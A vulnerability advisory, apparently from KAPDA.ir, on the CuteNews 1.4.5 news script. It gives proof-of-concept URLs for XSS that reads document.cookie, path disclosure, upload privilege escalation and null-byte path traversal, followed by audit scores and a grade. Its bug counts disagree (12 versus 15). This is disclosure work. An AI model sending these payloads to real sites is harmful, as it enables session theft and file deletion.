Product: cutenews 1.4.5
Vendor: http://cutephp.com


The Results through security analysis of cutenews
1.4.5
[provided by KAPDA.ir]
--------------------------------------------------



Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES


 Statistical Results from 'security Audit' perspective

TOTAL UNIQUE BUGS (12) 

Number of integration errors: 3 
Type: Path Disclosure , Authorization error
(privileges escalation), XSS
PoC:index.php?debug
DREAD Severity: 7 (Low)
PoC:index.php?mod=images&subaction=upload
DREAD Severity: 12 (Medium)
PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)



Number of Technical errors: 9
Type: XSS ,Html Injection, Path disclosure, Path
traversal

PoC:show_news.php?KAPDA="><script>alert()</script>
DREAD Severity: 7 (Low)
PoC:index.php?mod=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
DREAD Severity: 8 (Medium)
PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:Story
field:</textarea><script>alert(document.cookie)</script>
DREAD Severity: 12 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&selected_news=)
DREAD Severity: 7 (Low)
PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=../upimages/ddddd.php%00
DREAD Severity: 10 (Medium)

Number of Logical errors: 0


 Statistical Results from 'functional Risk Base'
perspective


Authentication mechanism: passed
Use a policy of least-privileged accounts: passed
Session Management: passed
Cookie Management: passed
Sensitive Data Management: passed
Cryptography:passed
Error handling: Passed But with negligence
Authorization: Passed But with negligence
Configuration Management:Passed But with negligence
PHP Coding Performance: Passed But with negligence
Security by design: Passed But with negligence
Note: using Extract() improperly, leads to several
cross site scripting bugs.
Input/Data validation: Not passed
Auditing and Logging: Not Passed


 Statistical Results from 'Security Metrics'
perspective


Number of discovered bugs: 15 
Number of reviewed Code Lines: 6000
Bugs per 10KLOC: 25 
Vulnerabilities severity average: Low
Number of discovered bugs after stable release: 15
Number of 'Documents' pages relevant to security: 1
Quality of Security support: Moderate



Security Grade at the current version (1.4.5) From
Kapda : B-
Note: All Grades are: A , B+ , B , B- , C+ , C , C- ,
D


Reference: http://www.kapda.ir/advisory-450.html


 
____________________________________________________________________________________
Sponsored Link

Online degrees - find the right program to advance your career.
Www.nextag.com